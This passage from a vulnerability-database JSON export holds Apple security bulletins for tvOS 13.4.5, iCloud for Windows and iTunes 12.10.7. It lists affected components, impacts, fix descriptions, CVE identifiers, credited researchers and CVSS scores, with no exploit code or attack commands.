information.\n\nPublished Date: October 31, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-20T00:00:00", "type": "apple", "title": "About the security content of tvOS 13.4.5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9512", "CVE-2019-20503", "CVE-2020-3878", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9791", "CVE-2020-9794", "CVE-2020-9795", "CVE-2020-9797", "CVE-2020-9800", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9808", "CVE-2020-9809", "CVE-2020-9811", "CVE-2020-9812", "CVE-2020-9813", "CVE-2020-9814", "CVE-2020-9815", "CVE-2020-9816", "CVE-2020-9821", "CVE-2020-9827", "CVE-2020-9829", "CVE-2020-9837", "CVE-2020-9839", "CVE-2020-9842", "CVE-2020-9843", "CVE-2020-9850", "CVE-2020-9852", "CVE-2020-9854", "CVE-2020-9994"], "modified": "2020-05-20T00:00:00", "id": "APPLE:664BB2884C7D375FC11AD8C7123D5CCD", "href": "https://support.apple.com/kb/HT211171", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:43", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## tvOS 13.4.5\n\nReleased May 26, 2020\n\n**Accounts**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt\n\n**AppleMobileFileIntegrity**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application could interact with system processes to access private information and perform privileged actions\n\nDescription: An entitlement parsing issue was addressed with improved parsing.\n\nCVE-2020-9842: Linus Henze (pinauten.de)\n\n**Audio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Audio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**CoreText**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9829: Aaron Perris (@aaronp613), an anonymous researcher, an anonymous researcher, Carlos S Tech, Sam Menzies of Sam\u2019s Lounge, Sufiyan Gouri of Lovely Professional University, India, Suleman Hasan Rathor of Arabic-Classroom.com\n\n**FontParser**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9816: Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**IPSec**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to leak memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9837: Thijs Alkemade of Computest\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to determine another application's memory layout\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2020-9797: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9811: Tielei Wang of Pangu Lab\n\nCVE-2020-9812: derrek (@derrekr6)\n\n**Kerne**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n\nCVE-2020-9813: Xinru Chi of Pangu Lab\n\nCVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9809: Benjamin Randazzo (@____benjamin)\n\n**libxpc**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to overwrite arbitrary files\n\nDescription: A path handling issue was addressed with improved validation.\n\nCVE-2020-9994: Apple\n\nEntry added September 21, 2020\n\n**rsync**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to overwrite existing files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2014-9512: gaojianfeng\n\nEntry added July 28, 2020\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2020-9854: Ilias Morad (A2nkF)\n\nEntry added July 28, 2020\n\n**SQLite**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**System Preferences**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-9839: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebRTC**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2019-20503: Natalie Silvanovich of Google Project Zero\n\n\n\n## Additional recognition\n\n**CoreText**\n\nWe would like to acknowledge Jiska Classen (@naehrdine) and Dennis Heinze (@ttdennis) of Secure Mobile Networking Lab for their assistance.\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**IOHIDFamily**\n\nWe would like to acknowledge Andy Davis of NCC Group for their assistance.\n\n**IPSec**\n\nWe would like to acknowledge Thijs Alkemade of Computest for their assistance.\n\nEntry added August 10, 2020\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Luke Walker of Manchester Metropolitan University for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n", "edition": 8, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-21T04:33:14", "title": "About the security content of tvOS 13.4.5 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9827", "CVE-2014-9512", "CVE-2020-9837", "CVE-2020-9791", "CVE-2020-9803", "CVE-2020-9852", "CVE-2020-9854", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9812", "CVE-2020-3878", "CVE-2020-9839", "CVE-2020-9795", "CVE-2020-9813", "CVE-2020-9821", "CVE-2020-9802", "CVE-2020-9809", "CVE-2020-9800", "CVE-2020-9842", "CVE-2020-9815", "CVE-2020-9790", "CVE-2020-9850", "CVE-2020-9829", "CVE-2020-9807", "CVE-2020-9808", "CVE-2020-9811", "CVE-2020-9843", "CVE-2020-9814", "CVE-2020-9816", "CVE-2020-9789", "CVE-2020-9797", "CVE-2020-9794", "CVE-2020-9994", "CVE-2019-20503"], "modified": "2020-09-21T04:33:14", "id": "APPLE:HT211171", "href": "https://support.apple.com/kb/HT211171", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:41", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iCloud for Windows 11.2\n\nReleased May 26, 2020\n\n**ImageIO**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**ImageIO**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**SQLite**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n\n\n## Additional recognition\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-27T12:41:22", "title": "About the security content of iCloud for Windows 11.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-3878", "CVE-2020-9802", "CVE-2020-9800", "CVE-2020-9790", "CVE-2020-9850", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9789", "CVE-2020-9794"], "modified": "2020-05-27T12:41:22", "id": "APPLE:HT211179", "href": "https://support.apple.com/kb/HT211179", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T22:12:14", "description": "# About the security content of iTunes 12.10.7 for Windows\n\nThis document describes the security content of iTunes 12.10.7 for Windows.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iTunes 12.10.7 for Windows\n\nReleased May 20, 2020\n\n**ImageIO**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**ImageIO**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n## Additional recognition\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 06, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T00:00:00", "type": "apple", "title": "About the security content of iTunes 12.10.7 for Windows", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3878", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9794", "CVE-2020-9800", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-05-21T00:00:00", "id": "APPLE:D7732CBB7EC3F59A83A8A74E674D8D67", "href": "https://support.apple.com/kb/HT211178", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:05", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iCloud for Windows 7.19\n\nReleased May 26, 2020\n\n**ImageIO**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**ImageIO**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n\n\n## Additional recognition\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-27T12:39:00", "title": "About the security content of iCloud for Windows 7.19 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-3878", "CVE-2020-9802", "CVE-2020-9800", "CVE-2020-9790", "CVE-2020-9850", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9789", "CVE-2020-9794"], "modified": "2020-05-27T12:39:00", "id": "APPLE:HT211181", "href": "https://support.apple.com/kb/HT211181", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:32", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iTunes 12.10.7 for Windows\n\nReleased May 20, 2020\n\n**ImageIO**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security 